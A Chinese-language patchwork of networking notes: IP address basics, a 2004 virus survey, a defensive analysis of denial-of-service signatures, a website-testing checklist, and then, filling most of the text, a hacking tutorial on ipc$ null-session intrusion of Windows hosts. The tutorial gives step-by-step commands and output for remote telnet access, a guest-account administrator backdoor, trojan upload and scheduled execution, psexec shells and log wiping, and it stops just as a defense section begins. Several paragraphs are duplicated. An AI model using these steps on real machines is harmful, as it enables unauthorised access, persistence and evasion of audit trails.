1.IP地址基础知识。
在Internet上有千百万台主机,为了区分这些主机,人们给每台主机都分配了一个专门的地址,称为IP地址。通过IP地址就可以访问到每一台主机。IP地址由4部分数字组成,每部分数字对应于8位二进制数字,各部分之间用小数点分开。如某一台主机的IP地址为:211.152.65.112 ,Internet IP地址由NIC(Internet Network Information Center)统一负责全球地址的规划、管理;同时由Inter NIC、APNIC、RIPE三大 *** 信息中心具体负责美国及其它地区的IP地址分配。
固定IP:固定IP地址是长期固定分配给一台计算机使用的IP地址,一般是特殊的服务器才拥有固定IP地址。
动态IP:因为IP地址资源非常短缺,通过 *** 拨号上网或普通宽带上网用户一般不具备固定IP地址,而是由ISP动态分配暂时的一个IP地址。普通人一般不需要去了解动态IP地址,这些都是计算机系统自动完成的。
公有地址(Public address)由Inter NIC(Internet Network Information Center 因特网信息中心)负责。这些IP地址分配给注册并向Inter NIC提出申请的组织机构。通过它直接访问因特网。
私有地址(Private address)属于非注册地址,专门为组织机构内部使用。
以下列出留用的内部私有地址
A类 10.0.0.0--10.255.255.255
B类 172.16.0.0--172.31.255.255
C类 192.168.0.0--192.168.255.255
2.IP地址是由什么机构分配的?
所有的IP地址都由国际组织NIC(Network Information Center)负责统一分配,目前全世界共有三个这样的 *** 信息中心。
InterNIC:负责美国及其他地区;
ENIC:负责欧洲地区;
APNIC:负责亚太地区。
我国申请IP地址要通过APNIC,APNIC的总部设在日本东京大学。申请时要考虑申请哪一类的IP地址,然后向国内的 *** 机构提出。
3.什么是公有地址和私有地址?
公有地址(Public address)由Inter NIC(Internet Network Information Center 因特网信息中心)负责。这些IP地址分配给注册并向Inter NIC提出申请的组织机构。通过它直接访问因特网。
私有地址(Private address)属于非注册地址,专门为组织机构内部使用。
以下列出留用的内部私有地址
A类 10.0.0.0--10.255.255.255
B类 172.16.0.0--172.31.255.255
C类 192.168.0.0--192.168.255.255
4.为什么会受到 *** 攻击?
据中国公安部消息,公安部2004年全国信息 *** 安全状况暨计算机病毒疫情调查活动圆满结束,调查表明,中国计算机用户计算机病毒的感染率为87.9%,比去年增加了2%。
调查表明,中国计算机用户计算机病毒的感染率为87.9%,比去年增加了2%。但是,3次以上感染计算机病毒的用户数量有较大回落,占全部感染用户数量的57.1%,比去年减少了26%,表明受过病毒感染用户的防范能力有所提高。
2003年5月至2004年5月,中国感染率更高的计算机病毒是 *** 蠕虫病毒和针对浏览器的病毒或者恶意代码,如“震荡波”、“ *** 天空”、“尼姆达”、“SQL蠕虫”等。计算机病毒造成的破坏和损失情况比往年有所下降,但针对 *** 的破坏呈明显上升趋势,特别是一些盗取计算机用户帐号、密码等敏感信息的计算机病毒隐蔽性强、危害性大。
调查表明,被调查单位发生 *** 安全事件比例为58%。其中,发生1次的占总数的22%,2次的占13%,3次以上的占23%。发生 *** 安全事件中,计算机病毒、蠕虫和木马程序造成的安全事件占发生安全事件单位总数的79%,拒绝服务、端口扫描和篡改网页等 *** 攻击事件占43%,大规模垃圾邮件传播造成的安全事件占36%。54%的被调查单位 *** 安全事件造成的损失比较轻微,损失严重和非常严重的占发生安全事件单位总数的10%。
造成 *** 安全事件的主要原因是安全管理制度不落实和安全防范意识薄弱,其中因未修补、防范软件漏洞等原因造成的安全事件占总数的66%。同时,调查表明信息 *** 使用单位对安全管理工作的重视程度、落实安全管理措施和采用安全专用技术产品等方面均有所提高和加强,但是用户安全观念薄弱、安全管理人员缺乏培训,以及缺乏有效的安全信息通报渠道、安全服务行业发展不能满足社会需要等问题仍然比较突出。
造成 *** 安全事件的主要原因是安全管理制度不落实和安全防范意识薄弱,其中因未修补、防范软件漏洞等原因造成的安全事件占总数的66%。同时,调查表明信息 *** 使用单位对安全管理工作的重视程度、落实安全管理措施和采用安全专用技术产品等方面均有所提高和加强,但是用户安全观念薄弱、安全管理人员缺乏培训,以及缺乏有效的安全信息通报渠道、安全服务行业发展不能满足社会需要等问题仍然比较突出。
5.黑客攻击行为特征分析 反攻击技术综合性分析报告
要想更好的保护 *** 不受黑客的攻击,就必须对黑客的攻击 *** 、攻击原理、攻击过程有深入的、详细的了解,只有这样才能更有效、更具有针对性的进行主动防护。下面通过对黑客攻击 *** 的特征分析,来研究如何对黑客攻击行为进行检测与防御。
一、反攻击技术的核心问题
反攻击技术(入侵检测技术)的核心问题是如何截获所有的 *** 信息。目前主要是通过两种途径来获取信息,一种是通过 *** 侦听的途径(如Sniffer,Vpacket等程序)来获取所有的 *** 信息(数据包信息, *** 流量信息、 *** 状态信息、 *** 管理信息等),这既是黑客进行攻击的必然途径,也是进行反攻击的必要途径;另一种是通过对操作系统和应用程序的系统日志进行分析,来发现入侵行为和系统潜在的安全漏洞。
二、黑客攻击的主要方式
黑客对 *** 的攻击方式是多种多样的,一般来讲,攻击总是利用“系统配置的缺陷”,“操作系统的安全漏洞”或“通信协议的安全漏洞”来进行的。到目前为止,已经发现的攻击方式超过2000种,其中对绝大部分黑客攻击手段已经有相应的解决 *** ,这些攻击大概可以划分为以下六类:
1.拒绝服务攻击:一般情况下,拒绝服务攻击是通过使被攻击对象(通常是工作站或重要服务器)的系统关键资源过载,从而使被攻击对象停止部分或全部服务。目前已知的拒绝服务攻击就有几百种,它是最基本的入侵攻击手段,也是最难对付的入侵攻击之一,典型示例有SYN Flood攻击、Ping Flood攻击、Land攻击、WinNuke攻击等。
2.非授权访问尝试:是攻击者对被保护文件进行读、写或执行的尝试,也包括为获得被保护访问权限所做的尝试。
3.预探测攻击:在连续的非授权访问尝试过程中,攻击者为了获得 *** 内部的信息及 *** 周围的信息,通常使用这种攻击尝试,典型示例包括SATAN扫描、端口扫描和IP半途扫描等。
4.可疑活动:是通常定义的“标准” *** 通信范畴之外的活动,也可以指 *** 上不希望有的活动,如IP Unknown Protocol和Duplicate IP Address事件等。
5.协议解码:协议解码可用于以上任何一种非期望的 *** 中, *** 或安全管理员需要进行解码工作,并获得相应的结果,解码后的协议信息可能表明期望的活动,如FTU User和Portmapper Proxy等解码方式。
6.系统 *** 攻击:这种攻击通常是针对单个主机发起的,而并非整个 *** ,通过RealSecure系统 *** 可以对它们进行监视。
三、黑客攻击行为的特征分析与反攻击技术
入侵检测的最基本手段是采用模式匹配的 *** 来发现入侵攻击行为,要有效的进反攻击首先必须了解入侵的原理和工作机理,只有这样才能做到知己知彼,从而有效的防止入侵攻击行为的发生。下面我们针对几种典型的入侵攻击进行分析,并提出相应的对策。
1.Land攻击
攻击类型:Land攻击是一种拒绝服务攻击。
攻击特征:用于Land攻击的数据包中的源地址和目标地址是相同的,因为当操作系统接收到这类数据包时,不知道该如何处理堆栈中通信源地址和目的地址相同的这种情况,或者循环发送和接收该数据包,消耗大量的系统资源,从而有可能造成系统崩溃或死机等现象。
检测 *** :判断 *** 数据包的源地址和目标地址是否相同。
反攻击 *** :适当配置防火墙设备或过滤路由器的过滤规则就可以防止这种攻击行为(一般是丢弃该数据包),并对这种攻击进行审计(记录事件发生的时间,源主机和目标主机的MAC地址和IP地址)。
2.TCP SYN攻击
攻击类型:TCP SYN攻击是一种拒绝服务攻击。
攻击特征:它是利用TCP客户机与服务器之间三次握手过程的缺陷来进行的。攻击者通过伪造源IP地址向被攻击者发送大量的SYN数据包,当被攻击主机接收到大量的SYN数据包时,需要使用大量的缓存来处理这些连接,并将SYN ACK数据包发送回错误的IP地址,并一直等待ACK数据包的回应,最终导致缓存用完,不能再处理其它合法的SYN连接,即不能对外提供正常服务。
检测 *** :检查单位时间内收到的SYN连接否收超过系统设定的值。
反攻击 *** :当接收到大量的SYN数据包时,通知防火墙阻断连接请求或丢弃这些数据包,并进行系统审计。
3.Ping Of Death攻击
攻击类型:Ping Of Death攻击是一种拒绝服务攻击。
攻击特征:该攻击数据包大于65535个字节。由于部分操作系统接收到长度大于65535字节的数据包时,就会造成内存溢出、系统崩溃、重启、内核失败等后果,从而达到攻击的目的。
检测 *** :判断数据包的大小是否大于65535个字节。
反攻击 *** :使用新的补丁程序,当收到大于65535个字节的数据包时,丢弃该数据包,并进行系统审计。
4.WinNuke攻击
攻击类型:WinNuke攻击是一种拒绝服务攻击。
攻击特征:WinNuke攻击又称带外传输攻击,它的特征是攻击目标端口,被攻击的目标端口通常是139、138、137、113、53,而且URG位设为“1”,即紧急模式。
检测 *** :判断数据包目标端口是否为139、138、137等,并判断URG位是否为“1”。
反攻击 *** :适当配置防火墙设备或过滤路由器就可以防止这种攻击手段(丢弃该数据包),并对这种攻击进行审计(记录事件发生的时间,源主机和目标主机的MAC地址和IP地址MAC)。
5.Teardrop攻击
攻击类型:Teardrop攻击是一种拒绝服务攻击。
攻击特征:Teardrop是基于UDP的病态分片数据包的攻击 *** ,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息),某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。
检测 *** :对接收到的分片数据包进行分析,计算数据包的片偏移量(Offset)是否有误。
反攻击 *** :添加系统补丁程序,丢弃收到的病态分片数据包并对这种攻击进行审计。
6.TCP/UDP端口扫描
攻击类型:TCP/UDP端口扫描是一种预探测攻击。
攻击特征:对被攻击主机的不同端口发送TCP或UDP连接请求,探测被攻击对象运行的服务类型。
检测 *** :统计外界对系统端口的连接请求,特别是对21、23、25、53、80、8000、8080等以外的非常用端口的连接请求。
反攻击 *** :当收到多个TCP/UDP数据包对异常端口的连接请求时,通知防火墙阻断连接请求,并对攻击者的IP地址和MAC地址进行审计。
对于某些较复杂的入侵攻击行为(如分布式攻击、组合攻击)不但需要采用模式匹配的 *** ,还需要利用状态转移、 *** 拓扑结构等 *** 来进行入侵检测。
四、入侵检测系统的几点思考
从性能上讲,入侵检测系统面临的一个矛盾就是系统性能与功能的折衷,即对数据进行全面复杂的检验构成了对系统实时性要求很大的挑战。
从技术上讲,入侵检测系统存在一些亟待解决的问题,主要表现在以下几个方面:
1.如何识别“大规模的组合式、分布式的入侵攻击”目前还没有较好的 *** 和成熟的解决方案。从Yahoo等著名ICP的攻击事件中,我们了解到安全问题日渐突出,攻击者的水平在不断地提高,加上日趋成熟多样的攻击工具,以及越来越复杂的攻击手法,使入侵检测系统必须不断跟踪最新的安全技术。
2. *** 入侵检测系统通过匹配 *** 数据包发现攻击行为,入侵检测系统往往假设攻击信息是明文传输的,因此对信息的改变或重新编码就可能骗过入侵检测系统的检测,因此字符串匹配的 *** 对于加密过的数据包就显得无能为力。
3. *** 设备越来越复杂、越来越多样化就要求入侵检测系统能有所定制,以适应更多的环境的要求。
4.对入侵检测系统的评价还没有客观的标准,标准的不统一使得入侵检测系统之间不易互联。入侵检测系统是一项新兴技术,随着技术的发展和对新攻击识别的增加,入侵检测系统需要不断的升级才能保证 *** 的安全性。
5.采用不恰当的自动反应同样会给入侵检测系统造成风险。入侵检测系统通常可以与防火墙结合在一起工作,当入侵检测系统发现攻击行为时,过滤掉所有来自攻击者的IP数据包,当一个攻击者假冒大量不同的IP进行模拟攻击时,入侵检测系统自动配置防火墙将这些实际上并没有进行任何攻击的地址都过滤掉,于是造成新的拒绝服务访问。
6.对IDS自身的攻击。与其他系统一样,IDS本身也存在安全漏洞,若对IDS攻击成功,则导致报警失灵,入侵者在其后的行为将无法被记录,因此要求系统应该采取多种安全防护手段。
7.随着 *** 的带宽的不断增加,如何开发基于高速 *** 的检测器(事件分析器)仍然存在很多技术上的困难。
入侵检测系统作为 *** 安全关键性测防系统,具有很多值得进一步深入研究的方面,有待于我们进一步完善,为今后的 *** 发展提供有效的安全手段。
回答补充:222.85.68.113为中国网通 河南郑州
网站测试流程 一、前台测试 1.浏览器兼容性测试 2.超链接检查 3.客户联系信息确认 4.前台特殊位置后台是否有修改位置 如:广告位,图片类的联系方式等 5.栏目测试,测试栏目新闻是否正确,栏目链接是否正确 6.与网站无关的测试信息的删除 二、后台测试 1.图片上传功能的测试 2.信息发布和前台栏目是否对应的检查 3.后台权限的测试,是否有删除栏目的功能等等 4.“基本设置”功能能否修改前台对应位置 5.在线留言功能的测试 6.产品的订单功能的测试 7.后台资讯推荐功能的测试
ipc$空连接使用
[ 2006-9-20 10:32:51 | By: yunlin2000 ]
目录 :
一 前言
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$连接所使用的端口
六 ipc$连接在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 如何打开目标的IPC$共享以及其他共享
十 一些需要shell才能完成的命令
十一 入侵中可能会用到的相关命令
十二 ipc$完整入侵步骤祥解
十三 如何防范ipc$入侵
十四 ipc$入侵问答精选
十五 结束的话
一 前言
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于之一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!
注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列,而鉴于win Xp在安全设置上有所提高,个别操作并不适用,有机会将单独讨论。
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?
三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?
空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?
四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从 *** 访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令:
1 首先,我们先建立一个空会话(需要目标开放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。
2 查看远程主机的共享资源
命令:net view \\IP
解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果:
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令:net time \\IP
解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的N *** )
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER 00 UNIQUE Registered
OYAMANISHI-H 00 GROUP Registered
OYAMANISHI-H 1C GROUP Registered
SERVER 20 UNIQUE Registered
OYAMANISHI-H 1B UNIQUE Registered
OYAMANISHI-H 1E GROUP Registered
SERVER 03 UNIQUE Registered
OYAMANISHI-H 1D UNIQUE Registered
..__MSBROWSE__.01 GROUP Registered
INet~Services 1C GROUP Registered
IS~SERVER......00 UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在EventLog中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?
五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 *** B:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 N *** :(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS *** 互联。
3 在WindowsNT中 *** B基于N *** 实现,而在Windows2000中, *** B除了基于N *** 实现,还可以直接通过445端口实现。
有了这些基础知识,我们就可以进一步来讨论访问 *** 共享对端口的选择了:
对于win2000客户端来说:
1 如果在允许N *** 的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止N *** 的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。由此可见,禁止了N *** 后的win 2000对win NT的共享访问将会失败。
对于win2000服务器端来说:
1 如果允许N *** , 那么UDP端口137, 138, TCP 端口 139, 445将开放;
2 如果禁止N *** ,那么只有445端口开放。
我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。
六 ipc$连接在hack攻击中的意义
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,那你可就了不得了,基本上可以为所欲为了。不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码将会越来越难的,因此今后你更大的可能就是以极小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都能成功,那是不现实的。
是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作终极武器,不要认为它战无不胜,它只是很多入侵 *** 中的一种,你有可能利用它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧!
七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:
1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;
2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;
3 你未启动Lanmanworkstation服务,它提供 *** 链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);
4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);
5 对方未启动NetLogon,它支持 *** 上计算机 pass-through 帐户登录身份;
6 对方禁止了N *** (即未打开139端口);
7 对方防火墙屏蔽了139和445端口;
8 你的用户名或者密码错误(显然空会话排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到 *** 路径: *** 有问题;
错误号53,找不到 *** 路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到 *** 名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是 *** 登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?
1 盲目复制
这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。
2 默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:
1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件;
2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)
3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;
还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。
4被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。
呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。
九 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。
十 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;
3 运行/关闭远程主机的服务,需要在shell下完成;
4 启动/杀掉远程主机的进程,也需要在shell下完成。
十一 入侵中可能会用到的相关命令
请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
1 建立空连接:
net use \\IP\ipc$ "" /user:""
2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"
3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP
4 查看本地主机的共享资源(可以看到本地的默认共享)
net share
5 得到远程主机的用户名列表
nbtstat -A IP
6 得到本地主机的用户列表
net user
7 查看远程主机的当前时间
net time \\IP
8 显示本地主机当前服务
net start
9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y
10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘
11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部
12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内
13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\ResumeTelnet.exe \\*.*.*.* administrator ""
17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创)
十二 ipc$完整入侵步骤祥解
其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!
1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空
2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧
3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
c:\OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90的telnet。
4 现在我们telnet上去
telnet 192.168.21.* 90
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了
5 C:\net user guest /active:yes
*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
6 C:\net user guest 1234
*将Guest的密码改为1234,或者改成你喜欢的密码
7 C:\net localgroup administrators guest /add
*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。
8 好了,现在我们来走另一条路,给它传个木马玩玩
9 首先,我们先建立起ipc$连接
C:\net use \\192.168.21.*\ipc$ "" /user:administrator
10 既然要上传东西,就要先知道它开了什么共享
C:\net view \\192.168.21.*
在 \\192.168.21.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。
11 C:\copy love.exe \\192.168.21.*\c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是更好的了,不容易被发现
12 运行木马前,我们先看看它现在的时间
net time \\192.168.21.*
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成
13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
C:\at \\192.168.21.* 11:02 c:\love.exe
新加了一项作业,其作业 ID = 1
14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了
嗯,好了,两种基本 *** 都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面
十三 如何防范ipc$入侵
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
*** 1:
